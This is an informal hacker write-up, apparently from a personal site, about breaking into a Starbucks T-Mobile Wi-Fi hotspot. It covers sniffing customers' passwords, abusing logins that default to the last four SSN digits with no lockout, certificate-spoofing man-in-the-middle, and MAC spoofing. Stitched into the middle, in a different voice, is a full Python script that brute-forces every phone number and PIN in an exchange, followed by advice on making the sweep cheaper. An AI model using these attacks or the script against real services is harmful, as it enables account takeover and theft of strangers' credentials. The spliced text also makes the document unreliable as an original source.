This is all the fun shit I intended to do at Starbucks when I got
distracted by GoatseAP. It's a rough
draft and work in progress, but the basics are here. If you find any
inaccuracies, mail me.
The obvious thing to do was sniff traffic. And, yes, it is mildly
amusing watching a yuppie gathering blasting their usernames and
passwords out across the network, at least for a while. (Every once
in a while, you even get one that's good for a shell on someone's
Linux box, but it's usually just POP3.)
So, I found that the local Starbucks (well, ONE of the local Starbucks)
left their AP on at night in the local mall, and I decided to go bang on
the network's front door for a while.
The Network
When you associate to the AP, get a DHCP lease, and fire up your browser,
you get an intercept page until you authenticate over HTTPS. The last time
I tried a fingerprint, Nmap identified the intercept box as some sort of Sun
machine, but I don't recall exactly.
What interested me was that DNS queries over 53/udp seem to pass straight
through the intercept mechanism before you've authenticated, although DNS over
53/tcp doesn't seem to work. It'd be interesting to do an IP tunnel over port
53/udp...
Dictionary attacks
If you're a T-Mobile subscriber with a
hotspot feature on your
account, your username is your phone number, and your password defaults to
the last four digits of your social security number -- yes, really. T-Mobile
uses this for pretty much everything. Every once in a while, they ask for
mom's maiden name, but 99% of the time, it's the last four of your SSN.
You can change this password, but I don't imagine it happening that often.
There also appears to be no sort of limit on how many bad login attempts
you get; I wrote a Perl program to run a dictionary attack on the intercept
page, and never got booted. (I lost this program two disk crashes ago, but
it was pretty trivial to write.)
So, given these two pieces of information, theoretically, all one would
have to do is grab a list of exchanges within an area code serviced by
T-Mobile and walk every number in those exchanges, trying each possible
last-four-of-SSN value against it. The "dictionary" is just 0000 through 9999,
so it's 10,000 guesses per number, and with no lockout the only cost is time.
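The attack sketched above as an added example (not the author's lost Perl program, and not code from the original page). The intercept page is stood in for by a constructed mock, since this has to run offline; the mock's lockout option is there to show what a login limit would have done to the sweep, and the area code and exchanges are made up.

```python
# Constructed example numbers; a real run would start from a list of exchanges
# actually serviced by the carrier.
AREA_CODE = "206"
EXCHANGES = ["555", "556"]
# The default password is the last four digits of the SSN: 10^4 candidates.
PIN_SPACE = [f"{i:04d}" for i in range(10000)]


class InterceptPage:
    """Stand-in for the hotspot login page, constructed for this example.

    Models the one behaviour the text reports (no lockout) and, optionally,
    the lockout it lacked, so the difference can be measured.
    """

    def __init__(self, accounts, lockout_threshold=None):
        self._accounts = dict(accounts)          # phone number -> password
        self._lockout_threshold = lockout_threshold
        self._failures = {}
        self.attempts = 0

    def login(self, username, password):
        self.attempts += 1
        failures = self._failures.get(username, 0)
        if self._lockout_threshold is not None and failures >= self._lockout_threshold:
            return "locked"
        if self._accounts.get(username) == password:
            return "ok"
        self._failures[username] = failures + 1
        return "fail"


def candidate_numbers(area_code, exchanges):
    """Every ten-digit number in the given exchanges (10,000 per exchange)."""
    for exch in exchanges:
        for line in range(10000):
            yield f"{area_code}{exch}{line:04d}"


def guess_account(page, number, pins=PIN_SPACE):
    """Try every PIN against one number. Returns the PIN, or None if exhausted
    or locked out."""
    for pin in pins:
        result = page.login(number, pin)
        if result == "ok":
            return pin
        if result == "locked":
            return None
    return None


def sweep(page, numbers, pins=PIN_SPACE):
    """Run the attack over an iterable of numbers; returns {number: pin}."""
    cracked = {}
    for number in numbers:
        pin = guess_account(page, number, pins)
        if pin is not None:
            cracked[number] = pin
    return cracked


def work_factor(n_exchanges, pins=PIN_SPACE):
    """Worst-case login attempts for a full sweep of n_exchanges exchanges."""
    return n_exchanges * 10000 * len(pins)


if __name__ == "__main__":
    # Constructed accounts; most numbers in a real exchange are not hotspot
    # subscribers at all, which is where most of the attempts go.
    accounts = {"2065550123": "4242", "2065560007": "9001"}
    page = InterceptPage(accounts)
    found = sweep(page, candidate_numbers(AREA_CODE, ["555"]))
    print(found, page.attempts, "attempts")
    print("full sweep worst case:", work_factor(len(EXCHANGES)))
```

Two things a practitioner would check before believing the 10^8-per-area-code number: whether the page answers differently for an unknown user than for a bad password (if it does, the sweep is ten thousand times cheaper, since only real accounts get the full PIN walk), and whether the lack of lockout survives a long run from one client IP, since "never got booted" during a short test is not the same as no rate limiting at all.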
Man-in-the-Middle attacks
And then there's the standard MitM attack. Spoof an SSL certificate --
nine times out of ten, they'll just click "Accept this self-signed haxx0r's
certificate" -- and relay requests to the real AP. You could probably do
this with airpwn, too.
Once they log in with their hotspot username and password, well. You can
figure it out.
MAC spoofing
I've tried this a couple of times, but it didn't seem to work; probably either
the address collisions with the real client were causing problems, or the
router ties the IP lease to the hardware address, or both. None would
surprise me too much. Or maybe I was just missing something from being wired
on shitty coffee, I dunno.